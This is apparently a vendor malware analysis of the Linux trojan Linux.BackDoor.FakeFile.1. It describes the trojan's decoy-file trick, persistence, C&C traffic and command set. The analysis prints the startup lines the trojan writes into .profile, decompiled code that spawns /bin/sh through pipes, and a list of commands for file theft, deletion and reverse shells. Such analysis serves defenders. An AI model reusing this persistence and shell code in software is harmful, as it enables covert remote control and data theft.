SHA1:
- 0138fc4d50c734e288388f7c8cbbea5e2ad08a8b
A backdoor for Linux. Upon launching, it copies itself to the file
<HOME>/.gconf/apps/gnome-common/gnome-common
It then searches for a hidden file, whose name matches the file name of the Trojan, and replaces the executable file with it. For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv.
If the file is found, the Trojan opens the respective application to view the file:
| Extension | application |
|---|---|
| ".doc .DOC .xls. XLS .ppt .PPT .docx .DOCX .xlsx .XLSX .pptx .PPTX .odt .ODT .ods .ODS .odp .ODP" | soffice |
| ".pdf .PDF" | evince |
| the rest is | gedit |
If the file is absent, the Trojan creates it and opens in the program gedit. The Trojan then checks the name of the Linux distribution installed on the device: if the name is something other than openSUSE, Linux.BackDoor.FakeFile.1 writes the following strings to the file <HOME>/.profile or the file <HOME>/.bash_profile:
# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
"$HOME/.gconf/apps/gnome-common/gnome-common"
fiThe program for viewing the file and the its own copy is launched as follows:
pipe(v32);
pipe(v31);
status = fork();
if ( !status )
{
close(0);
dup(v31[0]);
close(1);
dup(v32[1]);
close(2);
dup(v32[1]);
close(v32[1]);
close(v31[0]);
close(v32[0]);
close(v31[1]);
sleep(1u);
while ( execl("/bin/sh", "/bin/sh", 0) < 0 )
sleep(1u);
exit(status);
}
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);
close(1);
dup(v31[1]);
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
write(1, s1, strlen(s1));
write(1, &unk_8053D40, 1u);If the Trojan is launched from the folder <home>/.gconf/apps/gnome-common/gnome-common, it retrieves the configuration data from its file and decrypts it. After that, the malware program launches two threads: the first shares information with the command and control (C&C) server, and the second monitors the duration of the connection. If the Trojan goes for more than 30 minutes without receiving instructions, the connection is broken. When sharing information with the C&C server, the server’s replies are disguised under HTTP requests that looks as follows:
GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string>
HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: * /*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Linux.BackDoor.FakeFile.1 can execute the following commands:
| Name | Function |
|---|---|
| RR | Send the C&C server the quantity of messages transferred during the session; |
| DR | Send a list of the contents of the specified folder; |
| DF | Send the C&C server the specified file or a folder with all its contents; |
| D1 | Delete a file using the command rm –r |
| D0 | Delete a file using the command unlink |
| RF | Rename a folder; |
| US | Remove itself |
| RP | Launch a new copy of a process |
| Close the current session | |
| RT | Establish backconnect and run sh |
| CP | Terminate the backdoor’s operation |
| FF | Open the executable file of the process for writing |
| CO | Close the process file |
| BF | Create a file or folder |
| FD | Write the transmitted values to a file |
| EF | Obtain the directory listing by using the command ls |
| CX | Set 777 privileges on the specified file |
| CR | Terminate backconnect |
